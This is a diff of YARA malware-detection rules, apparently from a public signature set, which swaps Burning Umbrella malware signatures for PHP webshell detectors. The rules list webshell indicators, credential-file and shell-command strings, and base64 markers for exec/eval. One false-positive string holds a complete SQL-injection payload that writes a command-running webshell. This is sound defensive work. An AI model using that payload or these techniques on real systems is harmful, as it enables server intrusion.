+		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
+		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
+		$gen_bit_sus6 = "self.delete"
+		$gen_bit_sus9 = "\"cmd /c" nocase
+		$gen_bit_sus10 = "\"cmd\"" nocase
+		$gen_bit_sus11 = "\"cmd.exe" nocase
+		$gen_bit_sus12 = "%comspec%" wide ascii
+		$gen_bit_sus13 = "%COMSPEC%" wide ascii
+		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
+		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
+		$gen_bit_sus21 = "\"upload\"" wide ascii
+		$gen_bit_sus22 = "\"Upload\"" wide ascii
+		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
+		$gen_bit_sus24 = "fileupload" wide ascii
+		$gen_bit_sus25 = "file_upload" wide ascii
+		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
+		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
+		$gen_bit_sus30 = "serv-u" wide ascii
+		$gen_bit_sus31 = "Serv-u" wide ascii
+		$gen_bit_sus32 = "Army" fullword wide ascii
+		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
+		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
+		$gen_bit_sus35 = "crack" fullword wide ascii
+		$gen_bit_sus44 = "<pre>" wide ascii
+		$gen_bit_sus45 = "<PRE>" wide ascii
+		$gen_bit_sus46 = "shell_" wide ascii
+		$gen_bit_sus50 = "bypass" wide ascii
+		$gen_bit_sus52 = " ^ $" wide ascii
+		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
+		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
+		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
+		$gen_bit_sus57 = "dumper" wide ascii
+		$gen_bit_sus59 = "'cmd'" wide ascii
+		$gen_bit_sus60 = "\"execute\"" wide ascii
+		$gen_bit_sus61 = "/bin/sh" wide ascii
+		$gen_bit_sus62 = "Cyber" wide ascii
+		$gen_bit_sus63 = "portscan" fullword wide ascii
+		$gen_bit_sus66 = "whoami" fullword wide ascii
+		$gen_bit_sus67 = "$password='" fullword wide ascii
+		$gen_bit_sus68 = "$password=\"" fullword wide ascii
+		$gen_bit_sus69 = "$cmd" fullword wide ascii
+		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
+		$gen_bit_sus71 = "Hacking" fullword wide ascii
+		$gen_bit_sus72 = "hacking" fullword wide ascii
+		$gen_bit_sus73 = ".htpasswd" wide ascii
+		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
+		$gen_much_sus7 = "Web Shell" nocase
+		$gen_much_sus8 = "WebShell" nocase
+		$gen_much_sus3 = "hidded shell"
+		$gen_much_sus4 = "WScript.Shell.1" nocase
+		$gen_much_sus5 = "AspExec"
+		$gen_much_sus14 = "\\pcAnywhere\\" nocase
+		$gen_much_sus15 = "antivirus" nocase
+		$gen_much_sus16 = "McAfee" nocase
+		$gen_much_sus17 = "nishang"
+		$gen_much_sus18 = "\"unsafe" fullword wide ascii
+		$gen_much_sus19 = "'unsafe" fullword wide ascii
+		$gen_much_sus24 = "exploit" fullword wide ascii
+		$gen_much_sus25 = "Exploit" fullword wide ascii
+		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
+		$gen_much_sus30 = "Hacker" wide ascii
+		$gen_much_sus31 = "HACKED" fullword wide ascii
+		$gen_much_sus32 = "hacked" fullword wide ascii
+		$gen_much_sus33 = "hacker" wide ascii
+		$gen_much_sus34 = "grayhat" nocase wide ascii
+		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
+		$gen_much_sus36 = "Rootkit" wide ascii
+		$gen_much_sus37 = "rootkit" wide ascii
+		$gen_much_sus38 = "/*-/*-*/" wide ascii
+		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
+		$gen_much_sus40 = "\"e\"+\"v" wide ascii
+		$gen_much_sus41 = "a\"+\"l\"" wide ascii
+		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
+		$gen_much_sus43 = "q\"+\"u\"" wide ascii
+		$gen_much_sus44 = "\"u\"+\"e" wide ascii
+		$gen_much_sus45 = "/*//*/" wide ascii
+		$gen_much_sus46 = "(\"/*/\"" wide ascii
+		$gen_much_sus47 = "eval(eval(" wide ascii
+		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
+		$gen_much_sus49 = "Shell.Users" wide ascii
+		$gen_much_sus50 = "PasswordType=Regular" wide ascii
+		$gen_much_sus51 = "-Expire=0" wide ascii
+		$gen_much_sus60 = "_=$$_" wide ascii
+		$gen_much_sus61 = "_=$$_" wide ascii
+		$gen_much_sus62 = "++;$" wide ascii
+		$gen_much_sus63 = "++; $" wide ascii
+		$gen_much_sus64 = "_.=$_" wide ascii
+		$gen_much_sus70 = "-perm -04000" wide ascii
+		$gen_much_sus71 = "-perm -02000" wide ascii
+		$gen_much_sus72 = "grep -li password" wide ascii
+		$gen_much_sus73 = "-name config.inc.php" wide ascii
+		$gen_much_sus75 = "password crack" wide ascii
+		$gen_much_sus76 = "mysqlDll.dll" wide ascii
+		$gen_much_sus77 = "net user" wide ascii
+		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
+		$gen_much_sus81 = /strrev\(['"]/ wide ascii
+		$gen_much_sus82 = "PHPShell" fullword wide ascii
+		$gen_much_sus821 = "PHP Shell" fullword wide ascii
+		$gen_much_sus83 = "phpshell" fullword wide ascii
+		$gen_much_sus84 = "PHPshell" fullword wide ascii
+		$gen_much_sus87 = "deface" wide ascii
+		$gen_much_sus88 = "Deface" wide ascii
+		$gen_much_sus89 = "backdoor" wide ascii
+		$gen_much_sus90 = "r00t" fullword wide ascii
+		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
+		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
+		$gen_much_sus93 = "eval(\"/*" wide ascii
+		$gen_much_sus94 = "http_response_code(404)" wide ascii
+		$gif = { 47 49 46 38 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_4 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Base64_Encoded_Payloads : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3489f64b-7ebc-55b8-bd11-afaa719e572b"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L68-L99"
+		description = "php webshell containing base64 encoded payload"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4e42b47d-725b-5e1f-9408-6c6329f60506"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L720-L870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1889ce1101ebb352c33279d40641f1f2312c45c6f7e267f4912a9faf320e5971"
+		hash = "88d0d4696c9cb2d37d16e330e236cb37cfaec4cd"
+		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
+		hash = "e726cd071915534761822805724c6c6bfe0fcac604a86f09437f03f301512dc5"
+		hash = "39b8871928d00c7de8d950d25bff4cb19bf9bd35942f7fee6e0f397ff42fbaee"
+		hash = "8cc9802769ede56f1139abeaa0735526f781dff3b6c6334795d1d0f19161d076"
+		hash = "4cda0c798908b61ae7f4146c6218d7b7de14cbcd7c839edbdeb547b5ae404cd4"
+		hash = "afd9c9b0df0b2ca119914ea0008fad94de3bd93c6919f226b793464d4441bdf4"
+		hash = "b2048dc30fc7681094a0306a81f4a4cc34f0b35ccce1258c20f4940300397819"
+		hash = "da6af9a4a60e3a484764010fbf1a547c2c0a2791e03fc11618b8fc2605dceb04"
+		hash = "222cd9b208bd24955bcf4f9976f9c14c1d25e29d361d9dcd603d57f1ea2b0aee"
+		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
+		hash = "6b6cd1ef7e78e37cbcca94bfb5f49f763ba2f63ed8b33bc4d7f9e5314c87f646"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "e2b1dfcfaa61e92526a3a444be6c65330a8db4e692543a421e19711760f6ffe2"
+		logic_hash = "8f606dc3e1e688cca144fe769af50980b4c25fa69b08c67aca8c676a6a060010"
 		score = 75
-		quality = 85
+		quality = 17
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1629e8abce9d670fdb66fa1ef73ad4181706eefb8adc8a9fd257b6a21be48c6"
+		importance = 70
 
 	strings:
-		$x1 = "dumpodbc.exe" fullword ascii
-		$x2 = "photo_Bundle.exe" fullword ascii
-		$x3 = "Connect 2 fails : %d,%s:%d" fullword ascii
-		$x4 = "Connect fails 1 : %d %s:%d" fullword ascii
-		$x5 = "New IP : %s,New Port: %d" fullword ascii
-		$x6 = "Micrsoft Corporation. All rights reserved." fullword wide
-		$x7 = "New ConFails : %d" fullword ascii
-		$s1 = "cmd /c net stop stisvc" fullword ascii
-		$s2 = "cmd /c net stop spooler" fullword ascii
-		$s3 = "\\temp\\s%d.dat" ascii
-		$s4 = "cmd /c net stop wuauserv" fullword ascii
-		$s5 = "User-Agent: MyApp/0.1" fullword ascii
-		$s6 = "%s->%s Fails : %d" fullword ascii
-		$s7 = "Enter WorkThread,Current sock:%d" fullword ascii
+		$decode1 = "base64_decode" fullword nocase wide ascii
+		$decode2 = "openssl_decrypt" fullword nocase wide ascii
+		$one1 = "leGVj"
+		$one2 = "V4ZW"
+		$one3 = "ZXhlY"
+		$one4 = "UAeABlAGMA"
+		$one5 = "lAHgAZQBjA"
+		$one6 = "ZQB4AGUAYw"
+		$two1 = "zaGVsbF9leGVj"
+		$two2 = "NoZWxsX2V4ZW"
+		$two3 = "c2hlbGxfZXhlY"
+		$two4 = "MAaABlAGwAbABfAGUAeABlAGMA"
+		$two5 = "zAGgAZQBsAGwAXwBlAHgAZQBjA"
+		$two6 = "cwBoAGUAbABsAF8AZQB4AGUAYw"
+		$three1 = "wYXNzdGhyd"
+		$three2 = "Bhc3N0aHJ1"
+		$three3 = "cGFzc3Rocn"
+		$three4 = "AAYQBzAHMAdABoAHIAdQ"
+		$three5 = "wAGEAcwBzAHQAaAByAHUA"
+		$three6 = "cABhAHMAcwB0AGgAcgB1A"
+		$four1 = "zeXN0ZW"
+		$four2 = "N5c3Rlb"
+		$four3 = "c3lzdGVt"
+		$four4 = "MAeQBzAHQAZQBtA"
+		$four5 = "zAHkAcwB0AGUAbQ"
+		$four6 = "cwB5AHMAdABlAG0A"
+		$five1 = "wb3Blb"
+		$five2 = "BvcGVu"
+		$five3 = "cG9wZW"
+		$five4 = "AAbwBwAGUAbg"
+		$five5 = "wAG8AcABlAG4A"
+		$five6 = "cABvAHAAZQBuA"
+		$six1 = "wcm9jX29wZW"
+		$six2 = "Byb2Nfb3Blb"
+		$six3 = "cHJvY19vcGVu"
+		$six4 = "AAcgBvAGMAXwBvAHAAZQBuA"
+		$six5 = "wAHIAbwBjAF8AbwBwAGUAbg"
+		$six6 = "cAByAG8AYwBfAG8AcABlAG4A"
+		$seven1 = "wY250bF9leGVj"
+		$seven2 = "BjbnRsX2V4ZW"
+		$seven3 = "cGNudGxfZXhlY"
+		$seven4 = "AAYwBuAHQAbABfAGUAeABlAGMA"
+		$seven5 = "wAGMAbgB0AGwAXwBlAHgAZQBjA"
+		$seven6 = "cABjAG4AdABsAF8AZQB4AGUAYw"
+		$eight1 = "ldmFs"
+		$eight2 = "V2YW"
+		$eight3 = "ZXZhb"
+		$eight4 = "UAdgBhAGwA"
+		$eight5 = "lAHYAYQBsA"
+		$eight6 = "ZQB2AGEAbA"
+		$nine1 = "hc3Nlcn"
+		$nine2 = "Fzc2Vyd"
+		$nine3 = "YXNzZXJ0"
+		$nine4 = "EAcwBzAGUAcgB0A"
+		$nine5 = "hAHMAcwBlAHIAdA"
+		$nine6 = "YQBzAHMAZQByAHQA"
+		$execu1 = "leGVjd"
+		$execu2 = "V4ZWN1"
+		$execu3 = "ZXhlY3"
+		$esystem1 = "lc3lzdGVt"
+		$esystem2 = "VzeXN0ZW"
+		$esystem3 = "ZXN5c3Rlb"
+		$opening1 = "vcGVuaW5n"
+		$opening2 = "9wZW5pbm"
+		$opening3 = "b3BlbmluZ"
+		$fp1 = { D0 CF 11 E0 A1 B1 1A E1 }
+		$fp2 = "YXBpLnRlbGVncmFtLm9"
+		$fp3 = " GET /"
+		$fp4 = " POST /"
+		$fpa1 = "/cn=Recipients"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and ( ( pe.exports ( "Print32" ) and 2 of them ) or 1 of ( $x* ) or 4 of them )
+		filesize < 300KB and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not any of ( $fp* ) and any of ( $decode* ) and ( ( any of ( $one* ) and not any of ( $execu* ) ) or any of ( $two* ) or any of ( $three* ) or ( any of ( $four* ) and not any of ( $esystem* ) ) or ( any of ( $five* ) and not any of ( $opening* ) ) or any of ( $six* ) or any of ( $seven* ) or any of ( $eight* ) or any of ( $nine* ) )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_6 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Unknown_1 : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7198a734-fd54-5cb5-9966-b91796a415c7"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L101-L115"
+		description = "obfuscated php webshell"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "93d01a4c-4c18-55d2-b682-68a1f6460889"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L872-L894"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ee671bc09cc0c84c9817ed800f1416a75f18a70fd2cf6a7e9f063fffa01fa003"
+		hash = "12ce6c7167b33cc4e8bdec29fb1cfc44ac9487d1"
+		hash = "cf4abbd568ce0c0dfce1f2e4af669ad2"
+		logic_hash = "ce2d4c87c001a45febf7eac5474aa0d24ea73067f9154203ef5653bf77e7028f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49ef2b98b414c321bcdbab107b8fa71a537958fe1e05ae62aaa01fe7773c3b4b"
+		importance = 70
 
 	strings:
-		$s1 = "ExecuteFile=\"hidcon:nowait:\\\"Word\\\\r.bat\\\"\"" fullword ascii
-		$s2 = "InstallPath=\"%Appdata%\\\\Microsoft\"" fullword ascii
+		$sp0 = /^<\?php \$[a-z]{3,30} = '/ wide ascii
+		$sp1 = "=explode(chr(" wide ascii
+		$sp2 = "; if (!function_exists('" wide ascii
+		$sp3 = " = NULL; for(" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		filesize < 300KB and all of ( $sp* )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_7 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Eval : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7e427512-a8ee-53ae-a141-e995e74ca845"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L117-L130"
+		description = "Generic PHP webshell which uses any eval/exec function in the same line with user input"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "79cfbd88-f6f7-5cba-a325-0a99962139ca"
+		date = "2021-01-07"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L896-L955"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "115774c17003408a04e4b2678f32392b5439b55f3d4688476f6f877520acf75d"
+		hash = "a61437a427062756e2221bfb6d58cd62439d09d9"
+		hash = "90c5cc724ec9cf838e4229e5e08955eec4d7bf95"
+		hash = "2b41abc43c5b6c791d4031005bf7c5104a98e98a00ee24620ce3e8e09a78e78f"
+		hash = "5c68a0fa132216213b66a114375b07b08dc0cb729ddcf0a29bff9ca7a22eaaf4"
+		hash = "de3c01f55d5346577922bbf449faaaaa1c8d1aaa64c01e8a1ee8c9d99a41a1be"
+		hash = "124065176d262bde397b1911648cea16a8ff6a4c8ab072168d12bf0662590543"
+		hash = "cd7450f3e5103e68741fd086df221982454fbcb067e93b9cbd8572aead8f319b"
+		hash = "ab835ce740890473adf5cc804055973b926633e39c59c2bd98da526b63e9c521"
+		hash = "31ff9920d401d4fbd5656a4f06c52f1f54258bc42332fc9456265dca7bb4c1ea"
+		hash = "64e6c08aa0b542481b86a91cdf1f50c9e88104a8a4572a8c6bd312a9daeba60e"
+		hash = "80e98e8a3461d7ba15d869b0641cdd21dd5b957a2006c3caeaf6f70a749ca4bb"
+		hash = "93982b8df76080e7ba4520ae4b4db7f3c867f005b3c2f84cb9dff0386e361c35"
+		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
+		hash = "fd5f0f81204ca6ca6e93343500400d5853012e88254874fc9f62efe0fde7ab3c"
+		hash = "883f48ed4e9646da078cabf6b8b4946d9f199660262502650f76450ecf60ddd5"
+		hash = "6d042b6393669bb4d98213091cabe554ab192a6c916e86c04d06cc2a4ca92c00"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		logic_hash = "4b7759e4761f5897bfb5e576df645a2e99cec4e703fb28d0fc275cf8f8848263"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4ce3a356d61fbbb067e1430b8ceedbe8965e0cfedd8fb43f1f719e2925b094a"
-		hash2 = "a8bfc1e013f15bc395aa5c047f22ff2344c343c22d420804b6d2f0a67eb6db64"
-		hash3 = "959612f2a9a8ce454c144d6aef10dd326b201336a85e69a604e6b3892892d7ed"
+		importance = 70
+
+	strings:
+		$geval = /\b(exec|shell_exec|passthru|system|popen|proc_open|pcntl_exec|eval|assert)[\t ]{0,300}(\(base64_decode)?(\(stripslashes)?[\t ]{0,300}(\(trim)?[\t ]{0,300}\(\$(_POST|_GET|_REQUEST|_SERVER\s?\[['"]HTTP_|GLOBALS\[['"]_(POST|GET|REQUEST))/ wide ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$gfp_3 = " GET /"
+		$gfp_4 = " POST /"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "f5b113d6708a3927b5cc48f2215fcaff"
+		filesize < 300KB and not ( any of ( $gfp* ) ) and $geval
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_8 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_Double_Eval_Tiny : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b89d5a1-1425-5cb7-b429-563769bc0943"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L132-L145"
+		description = "PHP webshell which probably hides the input inside an eval()ed obfuscated string"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "868db363-83d3-57e2-ac8d-c6125e9bdd64"
+		date = "2021-01-11"
+		modified = "2023-07-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L957-L1008"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a42667463ff006b155c93b8986ab75441ba00d0c3c146c2d4c6929250627d8d"
+		hash = "f66fb918751acc7b88a17272a044b5242797976c73a6e54ac6b04b02f61e9761"
+		hash = "6b2f0a3bd80019dea536ddbf92df36ab897dd295840cb15bb7b159d0ee2106ff"
+		hash = "aabfd179aaf716929c8b820eefa3c1f613f8dcac"
+		hash = "9780c70bd1c76425d4313ca7a9b89dda77d2c664"
+		hash = "006620d2a701de73d995fc950691665c0692af11"
+		logic_hash = "cf0405e8a44497574d75291bf86bf9413d9a64140e820f7f5a655fe5302c6918"
 		score = 75
-		quality = 85
+		quality = 42
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "73270fe9bca94fead1b5b38ddf69fae6a42e574e3150d3e3ab369f5d37d93d88"
+		importance = 70
 
 	strings:
-		$s1 = "cmd /c open %s" fullword ascii
+		$payload = /(\beval[\t ]{0,500}\([^)]|\bassert[\t ]{0,500}\([^)])/ nocase wide ascii
+		$fp1 = "clone" fullword wide ascii
+		$fp2 = "* @assert" ascii
+		$fp3 = "*@assert" ascii
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		filesize > 70 and filesize < 300 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and #payload >= 2 and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_10 : FILE
+rule SIGNATURE_BASE_WEBSHELL_PHP_OBFUSC : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4cb2211-efbe-55f9-99e3-c01601904509"
-		date = "2018-05-04"
-		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L147-L163"
+		description = "PHP webshell obfuscated"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f66e337b-8478-5cd3-b01a-81133edaa8e5"
+		date = "2021-01-12"
+		modified = "2025-09-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L1010-L1139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14d0ab1114c168d7222a49e68ba12718b6285969e667b95be665d59b1fc98358"
+		hash = "eec9ac58a1e763f5ea0f7fa249f1fe752047fa60"
+		hash = "181a71c99a4ae13ebd5c94bfc41f9ec534acf61cd33ef5bce5fb2a6f48b65bf4"
+		hash = "76d4e67e13c21662c4b30aab701ce9cdecc8698696979e504c288f20de92aee7"
+		hash = "1d0643927f04cb1133f00aa6c5fa84aaf88e5cf14d7df8291615b402e8ab6dc2"
+		logic_hash = "d300de628add5912955f4915921dc387bd3ca3e7bf327e3d9f0ae82e3839a3ec"
 		score = 75
-		quality = 85
+		quality = -23
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "70992a72412c5d62d003a29c3967fcb0687189d3290ebbc8671fa630829f6694"
-		hash2 = "48f0bbc3b679aac6b1a71c06f19bb182123e74df8bb0b6b04ebe99100c57a41e"
-		hash3 = "5475ae24c4eeadcbd49fcd891ce64d0fe5d9738f1c10ba2ac7e6235da97d3926"
+		importance = 70
 
 	strings:
-		$s1 = "revjj.syshell.org" fullword ascii
+		$gfp1 = "eval(\"return [$serialised_parameter"
+		$gfp2 = "$this->assert(strpos($styles, $"
+		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
+		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
+		$gfp5 = "$_POST[partition_by]($_POST["
+		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
+		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
+		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
+		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
+		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
+		$gfp11 = "(eval (getenv \"EPROLOG\")))"
+		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
+		$gfp13 = "assert(\\\""
+		$gfp14 = "PhutilUTF8TestCase"
+		$gfp15 = "chr(195).chr(128) => 'A',"
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
